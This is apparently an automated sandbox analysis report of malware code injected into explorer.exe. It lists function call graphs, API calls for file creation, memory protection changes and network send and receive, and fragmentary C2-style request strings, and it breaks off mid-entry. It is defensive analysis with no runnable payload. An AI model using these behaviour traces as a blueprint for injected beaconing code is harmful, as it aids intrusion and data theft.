112648c2 13731->13734 13733 1126526b 13733->13729 13735 11264934 13734->13735 13736 112649a6 13735->13736 13737 11264995 ObtainUserAgentString 13735->13737 13736->13733 13737->13736 13837 1125f42e 13838 1125f45b 13837->13838 13846 1125f4c9 13837->13846 13839 11269232 NtCreateFile 13838->13839 13838->13846 13840 1125f496 13839->13840 13841 1125f082 NtCreateFile 13840->13841 13845 1125f4c5 13840->13845 13843 1125f4b6 13841->13843 13842 11269232 NtCreateFile 13842->13846 13844 1125ef52 NtCreateFile 13843->13844 13843->13845 13844->13845 13845->13842 13845->13846 13847 1126522a 13848 1126525e 13847->13848 13849 112648c2 ObtainUserAgentString 13848->13849 13850 1126526b 13849->13850 13881 1126baa9 13882 1126baaf 13881->13882 13885 11266212 13882->13885 13884 1126bac7 13886 11266237 13885->13886 13887 1126621b 13885->13887 13886->13884 13887->13886 13888 112660c2 6 API calls 13887->13888 13888->13886 13923 112622f4 13926 11262349 13923->13926 13924 1126249f 13925 1125e8f2 NtProtectVirtualMemory 13924->13925 13930 112624c3 13924->13930 13925->13930 13926->13924 13927 1125e8f2 NtProtectVirtualMemory 13926->13927 13928 11262480 13927->13928 13929 1125e8f2 NtProtectVirtualMemory 13928->13929 13929->13924 13931 11262597 13930->13931 13932 1125e8f2 NtProtectVirtualMemory 13930->13932 13933 1125e8f2 NtProtectVirtualMemory 13931->13933 13934 112625bf 13931->13934 13932->13931 13933->13934 13937 112626b9 13934->13937 13939 1125e8f2 NtProtectVirtualMemory 13934->13939 13935 112626e1 13936 11265382 ObtainUserAgentString 13935->13936 13938 112626e9 13936->13938 13937->13935 13940 1125e8f2 NtProtectVirtualMemory 13937->13940 13939->13937 13940->13935 13496 11269232 13497 1126925c 13496->13497 13499 11269334 13496->13499 13498 11269410 NtCreateFile 13497->13498 13497->13499 13498->13499 13806 1125f5f1 13807 1125f606 13806->13807 13808 1125f60e 13806->13808 13810 11264662 13807->13810 13811 1126466b 13810->13811 13819 112647ba 13810->13819 13812 1125e0f2 6 API calls 13811->13812 13811->13819 13814 112646ee 13812->13814 13813 11264750 13816 1126483f 13813->13816 13818 11264791 13813->13818 13813->13819 13814->13813 13815 11269f82 6 API calls 13814->13815 13815->13813 13817 11269f82 6 API calls 13816->13817 13816->13819 13817->13819 13818->13819 13820 11269f82 6 API calls 13818->13820 13819->13808 13820->13819 13941 1125e0f1 13942 1125e109 13941->13942 13944 1125e1d3 13941->13944 13943 1125e012 6 API calls 13942->13943 13945 1125e113 13943->13945 13945->13944 13946 11269f82 6 API calls 13945->13946 13946->13944 13777 1126b9b3 13778 1126b9bd 13777->13778 13781 112606d2 13778->13781 13780 1126b9e0 13782 112606f7 13781->13782 13785 11260704 13781->13785 13783 1125e0f2 6 API calls 13782->13783 13784 112606ff 13783->13784 13784->13780 13785->13784 13786 1126072d 13785->13786 13788 11260737 13785->13788 13790 112662c2 13786->13790 13788->13784 13789 11269f82 6 API calls 13788->13789 13789->13784 13791 112662df 13790->13791 13792 112662cb 13790->13792 13791->13784 13792->13791 13794 112660c2 13792->13794 13795 112661f0 13794->13795 13796 112660cb 13794->13796 13795->13791 13796->13795 13797 11269f82 6 API calls 13796->13797 13797->13795 13821 1126b9f1 13822 1126b9f7 13821->13822 13825 11260852 13822->13825 13824 1126ba0f 13826 112608e4 13825->13826 13827 11260865 13825->13827 13826->13824 13827->13826 13829 11260887 13827->13829 13830 1126087e 13827->13830 13828 1126636f 13828->13824 13829->13826 13831 11264662 6 API calls 13829->13831 13830->13828 13832 112660c2 6 API calls 13830->13832 13831->13826 13832->13828 13889 112648be 13890 112648c3 13889->13890 13891 112649a6 13890->13891 13892 11264995 ObtainUserAgentString 13890->13892 13892->13891 13798 11261fbf 13800 11262016 13798->13800 13799 112620f0 13800->13799 13803 1125e8f2 NtProtectVirtualMemory 13800->13803 13804 112620bb 13800->13804 13801 112620e8 13802 11265382 ObtainUserAgentString 13801->13802 13802->13799 13803->13804 13804->13801 13805 1125e8f2 NtProtectVirtualMemory 13804->13805 13805->13801 13749 11269f7a 13750 11269fb8 13749->13750 13751 112665b2 socket 13750->13751 13752 1126a081 13750->13752 13757 1126a022 13750->13757 13751->13752 13753 1126a134 13752->13753 13755 1126a117 getaddrinfo 13752->13755 13752->13757 13754 11266732 connect 13753->13754 13756 1126a1b2 13753->13756 13753->13757 13754->13756 13755->13753 13756->13757 13758 112666b2 send 13756->13758 13760 1126a729 13758->13760 13759 1126a7f4 setsockopt recv 13759->13757 13760->13757 13760->13759 13851 1126883a 13852 11268841 13851->13852 13853 11269f82 6 API calls 13852->13853 13854 112688c5 13853->13854 13855 11268906 13854->13855 13856 11269232 NtCreateFile 13854->13856 13856->13855 13947 112620fb 13949 11262137 13947->13949 13948 112622d5 13949->13948 13950 1125e8f2 NtProtectVirtualMemory 13949->13950 13951 1126228a 13950->13951 13952 1125e8f2 NtProtectVirtualMemory 13951->13952 13955 112622a9 13952->13955 13953 112622cd 13954 11265382 ObtainUserAgentString 13953->13954 13954->13948 13955->13953 13956 1125e8f2 NtProtectVirtualMemory 13955->13956 13956->13953 13893 112660b9 13894 112660ed 13893->13894 13896 112661f0 13893->13896 13895 11269f82 6 API calls 13894->13895 13894->13896 13895->13896 13475 11269f82 13476 11269fb8 13475->13476 13478 1126a081 13476->13478 13486 1126a022 13476->13486 13487 112665b2 13476->13487 13479 1126a134 13478->13479 13481 1126a117 getaddrinfo 13478->13481 13478->13486 13482 1126a1b2 13479->13482 13479->13486 13490 11266732 13479->13490 13481->13479 13482->13486 13493 112666b2 13482->13493 13484 1126a7f4 setsockopt recv 13484->13486 13485 1126a729 13485->13484 13485->13486 13488 112665ec 13487->13488 13489 1126660a socket 13487->13489 13488->13489 13489->13478 13491 11266788 connect 13490->13491 13492 1126676a 13490->13492 13491->13482 13492->13491 13494 112666e7 13493->13494 13495 11266705 send 13493->13495 13494->13495 13495->13485 13873 1126ba4d 13874 1126ba53 13873->13874 13877 1125f782 13874->13877 13876 1126ba6b 13878 1125f78f 13877->13878 13879 1125f7ad 13878->13879 13880 11264662 6 API calls 13878->13880 13879->13876 13880->13879 13761 1126314a 13762 11263153 13761->13762 13767 11263174 13761->13767 13764 11265382 ObtainUserAgentString 13762->13764 13763 112631e7 13765 1126316c 13764->13765 13766 1125e0f2 6 API calls 13765->13766 13766->13767 13767->13763 13769 1125e1f2 13767->13769 13770 1125e20f 13769->13770 13771 1125e2c9 13769->13771 13772 11268f12 7 API calls 13770->13772 13774 1125e242 13770->13774 13771->13767 13772->13774 13773 1125e289 13773->13771 13775 1125e0f2 6 API calls 13773->13775 13774->13773 13776 1125f432 NtCreateFile 13774->13776 13775->13771 13776->13773 13857 1126ae0a 13858 11269942 13857->13858 13859 1126ae45 NtProtectVirtualMemory 13858->13859 13860 1126ae70 13859->13860 13957 11263cd4 13959 11263cd8 13957->13959 13958 11264022 13959->13958 13960 11263352 NtCreateFile 13959->13960 13961 11263f0d 13960->13961 13961->13958 13962 11263792 NtCreateFile 13961->13962 13962->13961 13500 1126ae12 13501 1126ae45 NtProtectVirtualMemory 13500->13501 13504 11269942 13500->13504 13503 1126ae70 13501->13503 13505 11269967 13504->13505 13505->13501 13861 1125f613 13863 1125f620 13861->13863 13862 1125f67e 13863->13862 13864 1126ae12 NtProtectVirtualMemory 13863->13864 13864->13863 13510 1125e2dd 13513 1125e31a 13510->13513 13511 1125e3fa 13512 1125e328 SleepEx 13512->13512 13512->13513 13513->13511 13513->13512 13517 11268f12 13513->13517 13526 1125f432 13513->13526 13536 1125e0f2 13513->13536 13518 11268f48 13517->13518 13523 11269134 13518->13523 13524 11269232 NtCreateFile 13518->13524 13525 112690e9 13518->13525 13542 11269f82 13518->13542 13519 11269125 13562 11268922 13519->13562 13523->13513 13524->13518 13525->13519 13554 11268842 13525->13554 13527 1125f45b 13526->13527 13535 1125f4c9 13526->13535 13528 11269232 NtCreateFile 13527->13528 13527->13535 13529 1125f496 13528->13529 13530 1125f4c5 13529->13530 13574 1125f082 13529->13574 13532 11269232 NtCreateFile 13530->13532 13530->13535 13532->13535 13533 1125f4b6 13533->13530 13583 1125ef52 13533->13583 13535->13513 13537 1125e1d3 13536->13537 13538 1125e109 13536->13538 13537->13513 13588 1125e012 13538->13588 13540 1125e113 13540->13537 13541 11269f82 6 API calls 13540->13541 13541->13537 13543 11269fb8 13542->13543 13544 112665b2 socket 13543->13544 13545 1126a081 13543->13545 13553 1126a022 13543->13553 13544->13545 13546 1126a134 13545->13546 13548 1126a117 getaddrinfo 13545->13548 13545->13553 13547 11266732 connect 13546->13547 13549 1126a1b2 13546->13549 13546->13553 13547->13549 13548->13546 13550 112666b2 send 13549->13550 13549->13553 13552 1126a729 13550->13552 13551 1126a7f4 setsockopt recv 13551->13553 13552->13551 13552->13553 13553->13518 13555 1126886d 13554->13555 13570 11269232 13555->13570 13557 11268906 13557->13525 13558 11268888 13558->13557 13559 11269f82 6 API calls 13558->13559 13560 112688c5 13558->13560 13559->13560 13560->13557 13561 11269232 NtCreateFile 13560->13561 13561->13557 13563 112689c2 13562->13563 13564 11269232 NtCreateFile 13563->13564 13565 112689d6 13564->13565 13566 11268a9f 13565->13566 13567 11268a5d 13565->13567 13569 11269f82 6 API calls 13565->13569 13566->13523 13567->13566 13568 11269232 NtCreateFile 13567->13568 13568->13566 13569->13567 13571 1126925c 13570->13571 13573 11269334 13570->13573 13572 11269410 NtCreateFile 13571->13572 13571->13573 13572->13573 13573->13558 13575 1125f420 13574->13575 13576 1125f0aa 13574->13576 13575->13533 13576->13575 13577 11269232 NtCreateFile 13576->13577 13579 1125f1f9 13577->13579 13578 1125f3df 13578->13533 13579->13578 13580 11269232 NtCreateFile 13579->13580 13581 1125f3c9 13580->13581 13582 11269232 NtCreateFile 13581->13582 13582->13578 13584 1125ef70 13583->13584 13585 1125ef84 13583->13585 13584->13530 13586 11269232 NtCreateFile 13585->13586 13587 1125f046 13586->13587 13587->13530 13589 1125e031 13588->13589 13590 1125e0cd 13589->13590 13591 11269f82 6 API calls 13589->13591 13590->13540 13591->13590 13865 1126ba1f 13866 1126ba25 13865->13866 13869 1125f5f2 13866->13869 13868 1126ba3d 13870 1125f60e 13869->13870 13871 1125f5fb 13869->13871 13870->13868 13871->13870 13872 11264662 6 API calls 13871->13872 13872->13870 13963 11261edd 13965 11261f06 13963->13965 13964 11261fa4 13965->13964 13966 1125e8f2 NtProtectVirtualMemory 13965->13966 13967 11261f9c 13966->13967 13968 11265382 ObtainUserAgentString 13967->13968 13968->13964 13833 11261dd9 13835 11261df0 13833->13835 13834 11261ecd 13835->13834 13836 11265382 ObtainUserAgentString 13835->13836 13836->13834

                                            Executed Functions

                                            Function 11269F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 11269f82-11269fb6 1 11269fd6-11269fd9 0->1 2 11269fb8-11269fbc 0->2 4 1126a8fe-1126a90c 1->4 5 11269fdf-11269fed 1->5 2->1 3 11269fbe-11269fc2 2->3 3->1 6 11269fc4-11269fc8 3->6 7 1126a8f6-1126a8f7 5->7 8 11269ff3-11269ff7 5->8 6->1 9 11269fca-11269fce 6->9 7->4 10 11269fff-1126a000 8->10 11 11269ff9-11269ffd 8->11 9->1 13 11269fd0-11269fd4 9->13 12 1126a00a-1126a010 10->12 11->10 11->12 14 1126a012-1126a020 12->14 15 1126a03a-1126a060 12->15 13->1 13->5 14->15 16 1126a022-1126a026 14->16 17 1126a062-1126a066 15->17 18 1126a068-1126a07c call 112665b2 15->18 16->7 19 1126a02c-1126a035 16->19 17->18 20 1126a0a8-1126a0ab 17->20 22 1126a081-1126a0a2 18->22 19->7 23 1126a144-1126a150 20->23 24 1126a0b1-1126a0b8 20->24 22->20 28 1126a8ee-1126a8ef 22->28 27 1126a156-1126a165 23->27 23->28 25 1126a0e2-1126a0f5 24->25 26 1126a0ba-1126a0dc call 11269942 24->26 25->28 30 1126a0fb-1126a101 25->30 26->25 31 1126a167-1126a178 call 11266552 27->31 32 1126a17f-1126a18f 27->32 28->7 30->28 34 1126a107-1126a109 30->34 31->32 36 1126a1e5-1126a21b 32->36 37 1126a191-1126a1ad call 11266732 32->37 34->28 41 1126a10f-1126a111 34->41 39 1126a22d-1126a231 36->39 40 1126a21d-1126a22b 36->40 43 1126a1b2-1126a1da 37->43 45 1126a247-1126a24b 39->45 46 1126a233-1126a245 39->46 44 1126a27f-1126a280 40->44 41->28 47 1126a117-1126a132 getaddrinfo 41->47 43->36 48 1126a1dc-1126a1e1 43->48 52 1126a283-1126a2e0 call 1126ad62 call 11267482 call 11266e72 call 1126b002 44->52 49 1126a261-1126a265 45->49 50 1126a24d-1126a25f 45->50 46->44 47->23 51 1126a134-1126a13c 47->51 48->36 53 1126a267-1126a26b 49->53 54 1126a26d-1126a279 49->54 50->44 51->23 63 1126a2f4-1126a354 call 1126ad92 52->63 64 1126a2e2-1126a2e6 52->64 53->52 53->54 54->44 69 1126a48c-1126a4b8 call 1126ad62 call 1126b262 63->69 70 1126a35a-1126a396 call 1126ad62 call 1126b262 call 1126b002 63->70 64->63 65 1126a2e8-1126a2ef call 11267042 64->65 65->63 80 1126a4ba-1126a4d5 69->80 81 1126a4d9-1126a590 call 1126b262 * 3 call 1126b002 * 2 call 11267482 69->81 85 1126a3bb-1126a3e9 call 1126b262 * 2 70->85 86 1126a398-1126a3b7 call 1126b262 call 1126b002 70->86 80->81 109 1126a595-1126a5b9 call 1126b262 81->109 101 1126a415-1126a41d 85->101 102 1126a3eb-1126a410 call 1126b002 call 1126b262 85->102 86->85 103 1126a442-1126a448 101->103 104 1126a41f-1126a425 101->104 102->101 103->109 110 1126a44e-1126a456 103->110 107 1126a467-1126a487 call 1126b262 104->107 108 1126a427-1126a43d 104->108 107->109 108->109 120 1126a5d1-1126a6ad call 1126b262 * 7 call 1126b002 call 1126ad62 call 1126b002 call 11266e72 call 11267042 109->120 121 1126a5bb-1126a5cc call 1126b262 call 1126b002 109->121 110->109 115 1126a45c-1126a45d 110->115 115->107 132 1126a6af-1126a6b3 120->132 121->132 134 1126a6b5-1126a6fa call 11266382 call 112667b2 132->134 135 1126a6ff-1126a72d call 112666b2 132->135 155 1126a8e6-1126a8e7 134->155 145 1126a72f-1126a735 135->145 146 1126a75d-1126a761 135->146 145->146 151 1126a737-1126a74c 145->151 147 1126a767-1126a76b 146->147 148 1126a90d-1126a913 146->148 152 1126a771-1126a773 147->152 153 1126a8aa-1126a8df call 112667b2 147->153 157 1126a779-1126a784 148->157 158 1126a919-1126a920 148->158 151->146 156 1126a74e-1126a754 151->156 152->153 152->157 153->155 155->28 156->146 163 1126a756 156->163 159 1126a786-1126a793 157->159 160 1126a795-1126a796 157->160 158->159 159->160 164 1126a79c-1126a7a0 159->164 160->164 163->146 167 1126a7a2-1126a7af 164->167 168 1126a7b1-1126a7b2 164->168 167->168 170 1126a7b8-1126a7c4 167->170 168->170 173 1126a7c6-1126a7ef call 1126ad92 call 1126ad62 170->173 174 1126a7f4-1126a861 setsockopt recv 170->174 173->174 177 1126a8a3-1126a8a4 174->177 178 1126a863 174->178 177->153 178->177 181 1126a865-1126a86a 178->181 181->177 182 1126a86c-1126a872 181->182 182->177 185 1126a874-1126a8a1 182->185 185->177 185->178
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction ID: a55db92c50f2d6510dfbe44a17826096a5d7f21b4e17e864c0e9122f761fec49
                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction Fuzzy Hash: 1952B134614A498FD719DF68C4847E9B7E5FB54304F60462EC9AFC7182EE34B989CB81
                                            Function 11269232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 303 11269232-11269256 304 1126925c-11269260 303->304 305 112698bd-112698cd 303->305 304->305 306 11269266-112692a0 304->306 307 112692a2-112692a6 306->307 308 112692bf 306->308 307->308 309 112692a8-112692ac 307->309 310 112692c6 308->310 312 112692b4-112692b8 309->312 313 112692ae-112692b2 309->313 311 112692cb-112692cf 310->311 314 112692d1-112692f7 call 11269942 311->314 315 112692f9-1126930b 311->315 312->311 316 112692ba-112692bd 312->316 313->310 314->315 320 11269378 314->320 315->320 321 1126930d-11269332 315->321 316->311 322 1126937a-112693a0 320->322 323 11269334-1126933b 321->323 324 112693a1-112693a8 321->324 327 11269366-11269370 323->327 328 1126933d-11269360 call 11269942 323->328 325 112693d5-112693dc 324->325 326 112693aa-112693d3 call 11269942 324->326 330 11269410-11269458 NtCreateFile call 11269172 325->330 331 112693de-1126940a call 11269942 325->331 326->320 326->325 327->320 333 11269372-11269373 327->333 328->327 339 1126945d-1126945f 330->339 331->320 331->330 333->320 339->320 340 11269465-1126946d 339->340 340->320 341 11269473-11269476 340->341 342 11269486-1126948d 341->342 343 11269478-11269481 341->343 344 112694c2-112694ec 342->344 345 1126948f-112694b8 call 11269942 342->345 343->322 351 112694f2-112694f5 344->351 352 112698ae-112698b8 344->352 345->320 350 112694be-112694bf 345->350 350->344 353 11269604-11269611 351->353 354 112694fb-112694fe 351->354 352->320 353->322 355 11269500-11269507 354->355 356 1126955e-11269561 354->356 361 11269538-11269559 355->361 362 11269509-11269532 call 11269942 355->362 358 11269616-11269619 356->358 359 11269567-11269572 356->359 367 1126961f-11269626 358->367 368 112696b8-112696bb 358->368 364 11269574-1126959d call 11269942 359->364 365 112695a3-112695a6 359->365 363 112695e9-112695fa 361->363 362->320 362->361 363->353 364->320 364->365 365->320 370 112695ac-112695b6 365->370 374 11269657-1126966b call 1126ae92 367->374 375 11269628-11269651 call 11269942 367->375 371 112696bd-112696c4 368->371 372 11269739-1126973c 368->372 370->320 381 112695bc-112695e6 370->381 382 112696c6-112696ef call 11269942 371->382 383 112696f5-11269734 371->383 377 112697c4-112697c7 372->377 378 11269742-11269749 372->378 374->320 392 11269671-112696b3 374->392 375->320 375->374 377->320 388 112697cd-112697d4 377->388 385 1126977a-112697bf 378->385 386 1126974b-11269774 call 11269942 378->386 381->363 382->352 382->383 398 11269894-112698a9 383->398 385->398 386->352 386->385 393 112697d6-112697f6 call 11269942 388->393 394 112697fc-11269803 388->394 392->322 393->394 396 11269805-11269825 call 11269942 394->396 397 1126982b-11269835 394->397 396->397 397->352 403 11269837-1126983e 397->403 398->322 403->352 407 11269840-11269886 403->407 407->398
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction ID: cca2a3760cfbb653d98e1523ea0fea3cfbe66fab0873e9259624352765dd64de
                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction Fuzzy Hash: 6B225B70B18A0A9FCB49DF28C4956EEB7E5FB58304F50022ED55ED7290EF30A491CB85
                                            Function 1126AE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 447 1126ae12-1126ae38 448 1126ae45-1126ae6e NtProtectVirtualMemory 447->448 449 1126ae40 call 11269942 447->449 450 1126ae70-1126ae7c 448->450 451 1126ae7d-1126ae8f 448->451 449->448
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 1126AE67
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction ID: 3e54a9ed3e09a0021f0770d23eb45ce6c20b1f6a873ee0b48d908385491b6242
                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction Fuzzy Hash: D301B534668B484F8784DF6CD48012AB7E4FBCD314F000B3EE99AC3250EB70C5418742
                                            Function 1126AE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 452 1126ae0a-1126ae6e call 11269942 NtProtectVirtualMemory 455 1126ae70-1126ae7c 452->455 456 1126ae7d-1126ae8f 452->456
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 1126AE67
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction ID: 1c6dcb808fa3982efd2f24c578235fcdbc618434e69e719d7d13cacf6c5cdacf
                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction Fuzzy Hash: 1601A734628B884F8745DF2C94411A6B3E5FBCE314F000B3EE99AC3240DB31D5028782
                                            Function 112648C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 112649A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 0bd3cbf970257dd1bb5daf2e3aca5a649efe3523946918ec383a1ed742b80ba1
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: B131D431714A4D8FCB05EFA8C8847EEBBE5FB58209F40022AD85ED7280DE749685C785
                                            Function 112648BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 112649A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 67736e468acdaad2c8a8ccb186bd6b42d3e6a91ce114462ba41c6912a417e3b1
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 7F219370A14A4E8FCB05DFA9C8847ED7BE5FF58209F40422AD85AD7280DF749685C785
                                            Function 11260B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 232 11260b66-11260b68 233 11260b93-11260bb8 232->233 234 11260b6a-11260b6b 232->234 237 11260bbb-11260bbc 233->237 235 11260bbe-11260c22 call 11267612 call 11269942 * 2 234->235 236 11260b6d-11260b71 234->236 246 11260cdc 235->246 247 11260c28-11260c2b 235->247 236->237 238 11260b73-11260b92 236->238 237->235 238->233 249 11260cde-11260cf6 246->249 247->246 248 11260c31-11260cd3 call 1126bda4 call 1126b022 call 1126b3e2 call 1126b022 call 1126b3e2 CreateMutexW 247->248 248->246 263 11260cd5-11260cda 248->263 263->249
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction ID: 31a3884c6c5bb5b84948d1c8ce8c9b40339f92891dd8fb52847222b3437b4137
                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction Fuzzy Hash: 9F415B74A18A098FDB44EFA8C8D47AD77F4FB58304F00457ACC4ADB295EE349985CB85
                                            Function 11260B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction ID: 15763fb354e673a551f54afb42231bd39080a73edf135a29738d72289ff25328
                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction Fuzzy Hash: 20413C74A18A098FDB44EFA8C4D87ED77F4FB58304F00456ACC4ADB295EE349985CB85
                                            Function 1126672E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 293 1126672e-11266768 294 1126676a-11266782 call 11269942 293->294 295 11266788-112667ab connect 293->295 294->295
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction ID: e669e9a9dea03db69fc3a023b3454c5711763828edce59d2da749cfb10ec8ae0
                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction Fuzzy Hash: 71015E30618B188FCB84EF1CE088B55B7E0FB59314F1545AED90DCB266CA74D881CBC2
                                            Function 11266732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 298 11266732-11266768 299 1126676a-11266782 call 11269942 298->299 300 11266788-112667ab connect 298->300 299->300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction ID: 6b7b1c8903567555a784a9dbfd47876f4a504faf23cf777bd556901148c0774c
                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
